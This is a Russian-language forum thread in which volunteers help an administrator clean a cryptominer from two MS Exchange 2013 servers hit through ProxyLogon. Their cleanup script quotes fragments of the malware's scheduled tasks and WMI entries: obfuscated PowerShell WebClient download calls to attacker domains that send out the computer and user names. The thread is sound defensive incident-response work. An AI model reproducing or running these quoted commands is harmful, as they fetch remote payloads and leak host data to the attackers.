[ Закрыто ] запуск майнера на серверах с MS Exchange 2013 , ProxyLogon

RSS

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 17.03.2021 16:49:30

Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.

Прикрепленные файлы

SPHVMAIL01_2021-03-17_16-33-37_v4.11.6.7z (754.89 КБ)

Изменено: Владимир Шариков - 12.11.2021 17:24:19

Ответы

Пред. 1 2 3 След.

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 17.03.2021 17:45:03

Цитата

santy написал:

Цитата
Владимир Шариков написал: Положу сюда сразу два образа двух серверов.

можно и второй образ положить

Прикрепленные файлы

IZTVMAIL01_2021-03-17_16-52-35_v4.11.6.7z (728.72 КБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.03.2021 17:50:43

Цитата

Владимир Шариков написал:

Цитата

santy написал:

Цитата
Владимир Шариков написал: Положу сюда сразу два образа двух серверов.

можно и второй образ положить

по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"

[ Как создать образ автозапуска? ]

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 17.03.2021 17:52:53

Цитата

santy написал:

Цитата

Владимир Шариков написал:

Цитата

santy написал:

Цитата
Владимир Шариков написал: Положу сюда сразу два образа двух серверов.

можно и второй образ положить

по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"

Да, это сертификаты обновляет.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.03.2021 17:54:46

по второму серверу:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;

Код
;uVS v4.11.6 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.3 v400c OFFSGNSAVE ;---------command-block--------- deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT deltsk T.NETCATKIT.COM delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT apply QUIT

Код


;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply

QUIT

без перезагрузка, пишем о старых и новых проблемах.
------------

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.03.2021 17:58:21

если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто эти задачи создает.
(при условии, конечно, если они будут воссозданы)

[ Как создать образ автозапуска? ]

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 17.03.2021 18:15:38

Цитата
santy написал: если будет возможность перегрузить сервера, выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки, возможно получиться увидеть, кто эти задачи создает. (при условии, конечно, если они будут воссозданы)

Цитата

santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто эти задачи создает.
(при условии, конечно, если они будут воссозданы)

твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

Прикрепленные файлы

Снимок.JPG (89.74 КБ)

Изменено: Владимир Шариков - 17.03.2021 18:17:11

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.03.2021 18:20:14

Цитата
Владимир Шариков написал: твик 39 что то найти не могу, найду.Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

uVS - дополнительно-твики. твик 39 в низу окна.

скриншот не увидел или не прикрепился

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.03.2021 18:22:27

Цитата
santy написал: скриншот не увидел или не прикрепился

да, теперь вижу. файл лучше отправить на virustotal.com для проверки другими антивирусами. возможно, и бэкдор

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 18.03.2021 04:37:50

Цитата
Владимир Шариков написал: Что этот код делает? Стоит ли боятся "Последствий" этой бяки?

я думаю стоит. эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)

Цитата
После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта. ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все. Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware. В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата

После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 18.03.2021 04:44:05

Цитата
Владимир Шариков написал: Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

это на клиентских системах происходит?

[ Как создать образ автозапуска? ]

Пред. 1 2 3 След.